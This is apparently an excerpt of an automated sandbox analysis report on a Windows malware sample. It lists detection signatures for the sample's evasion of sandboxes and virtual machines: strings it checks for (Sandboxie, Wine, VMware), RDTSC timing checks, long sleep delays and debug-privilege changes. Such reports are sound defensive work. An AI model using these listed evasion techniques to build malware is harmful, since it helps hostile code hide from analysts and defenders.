Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: iuvRyl9i7D.exe PID: 4928, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	RDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000608C04 second address: 0000000000608C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000608F9E second address: 0000000000608FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe TID: 3608	Thread sleep time: -45733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe TID: 6208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6500	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Code function: 12_2_00408ED0 rdtsc

12_2_00408ED0

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7432			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1085			Jump to behavior

Source: C:\Windows\SysWOW64\control.exe

API coverage: 9.2 %

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00611660 FindFirstFileW,FindNextFileW,FindClose,		21_2_00611660
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00611659 FindFirstFileW,FindNextFileW,FindClose,		21_2_00611659

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Thread delayed: delay time: 45733	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000012.00000000.343652210.00000000051AC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000012.00000000.306952519.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.306066644.0000000005134000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.328239618.00000000051F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000012.00000000.306066644.0000000005134000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000012.00000000.329987427.0000000006005000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00dRom0cY

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Code function: 12_2_00408ED0 rdtsc

12_2_00408ED0

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460746D mov eax, dword ptr fs:[00000030h]	21_2_0460746D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461AC7B mov eax, dword ptr fs:[00000030h]	21_2_0461AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461A44B mov eax, dword ptr fs:[00000030h]	21_2_0461A44B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467C450 mov eax, dword ptr fs:[00000030h]	21_2_0467C450
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467C450 mov eax, dword ptr fs:[00000030h]	21_2_0467C450
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461BC2C mov eax, dword ptr fs:[00000030h]	21_2_0461BC2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B740D mov eax, dword ptr fs:[00000030h]	21_2_046B740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B740D mov eax, dword ptr fs:[00000030h]	21_2_046B740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B740D mov eax, dword ptr fs:[00000030h]	21_2_046B740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1C06 mov eax, dword ptr fs:[00000030h]	21_2_046A1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h]	21_2_04666C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h]	21_2_04666C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h]	21_2_04666C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666C0A mov eax, dword ptr fs:[00000030h]	21_2_04666C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A14FB mov eax, dword ptr fs:[00000030h]	21_2_046A14FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h]	21_2_04666CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h]	21_2_04666CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666CF0 mov eax, dword ptr fs:[00000030h]	21_2_04666CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B8CD6 mov eax, dword ptr fs:[00000030h]	21_2_046B8CD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F849B mov eax, dword ptr fs:[00000030h]	21_2_045F849B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460C577 mov eax, dword ptr fs:[00000030h]	21_2_0460C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460C577 mov eax, dword ptr fs:[00000030h]	21_2_0460C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04623D43 mov eax, dword ptr fs:[00000030h]	21_2_04623D43
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04663540 mov eax, dword ptr fs:[00000030h]	21_2_04663540
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04693D40 mov eax, dword ptr fs:[00000030h]	21_2_04693D40
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04607D50 mov eax, dword ptr fs:[00000030h]	21_2_04607D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0466A537 mov eax, dword ptr fs:[00000030h]	21_2_0466A537
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AE539 mov eax, dword ptr fs:[00000030h]	21_2_046AE539
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h]	21_2_04614D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h]	21_2_04614D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04614D3B mov eax, dword ptr fs:[00000030h]	21_2_04614D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B8D34 mov eax, dword ptr fs:[00000030h]	21_2_046B8D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F3D34 mov eax, dword ptr fs:[00000030h]	21_2_045F3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EAD30 mov eax, dword ptr fs:[00000030h]	21_2_045EAD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h]	21_2_046AFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h]	21_2_046AFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h]	21_2_046AFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AFDE2 mov eax, dword ptr fs:[00000030h]	21_2_046AFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04698DF1 mov eax, dword ptr fs:[00000030h]	21_2_04698DF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]	21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]	21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]	21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666DC9 mov ecx, dword ptr fs:[00000030h]	21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]	21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04666DC9 mov eax, dword ptr fs:[00000030h]	21_2_04666DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FD5E0 mov eax, dword ptr fs:[00000030h]	21_2_045FD5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FD5E0 mov eax, dword ptr fs:[00000030h]	21_2_045FD5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046135A1 mov eax, dword ptr fs:[00000030h]	21_2_046135A1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B05AC mov eax, dword ptr fs:[00000030h]	21_2_046B05AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B05AC mov eax, dword ptr fs:[00000030h]	21_2_046B05AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]	21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]	21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]	21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]	21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E2D8A mov eax, dword ptr fs:[00000030h]	21_2_045E2D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h]	21_2_04611DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h]	21_2_04611DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04611DB5 mov eax, dword ptr fs:[00000030h]	21_2_04611DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h]	21_2_04612581
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h]	21_2_04612581
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h]	21_2_04612581
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612581 mov eax, dword ptr fs:[00000030h]	21_2_04612581
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461FD9B mov eax, dword ptr fs:[00000030h]	21_2_0461FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461FD9B mov eax, dword ptr fs:[00000030h]	21_2_0461FD9B
